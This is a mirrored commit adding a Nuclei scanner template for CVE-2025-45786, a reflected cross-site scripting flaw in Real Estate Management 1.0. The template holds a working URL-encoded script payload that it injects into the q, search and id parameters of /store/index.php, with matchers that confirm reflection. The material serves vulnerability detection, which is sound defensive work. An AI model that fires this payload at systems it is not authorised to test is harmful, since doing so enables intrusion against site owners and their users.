mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
Create CVE-2025-45786.yaml
This commit is contained in:
55
http/cves/2025/CVE-2025-45786.yaml
Normal file
55
http/cves/2025/CVE-2025-45786.yaml
Normal file
@@ -0,0 +1,55 @@
|
||||
id: CVE-2025-45786
|
||||
|
||||
info:
|
||||
name: Real Estate Management 1.0 - Reflected Cross-Site Scripting
|
||||
author: 0xKunAlx0
|
||||
severity: high
|
||||
description: |
|
||||
Real Estate Management 1.0 is vulnerable to reflected cross-site scripting (XSS) in /store/index.php.
|
||||
An attacker can inject malicious scripts via query parameters, which are then reflected in the response without proper sanitization.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2025-45786
|
||||
- https://gist.github.com/0xKunAlx0/a80bc7ec5acb2f19daa36257fedbcf11
|
||||
- https://updategadh.com/free-projects/real-estate-management/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
|
||||
cvss-score: 8.1
|
||||
cve-id: CVE-2025-45786
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: real-estate-management
|
||||
product: real_estate_management
|
||||
tags: cve,cve2025,xss,reflected,real-estate
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/store/index.php?{{param}}=%3Cscript%3Econsole.log('NUCLEI_XSS_TEST')%3C/script%3E"
|
||||
|
||||
payloads:
|
||||
param:
|
||||
- q
|
||||
- search
|
||||
- id
|
||||
|
||||
attack: batteringram
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NUCLEI_XSS_TEST"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Reference in New Issue
Block a user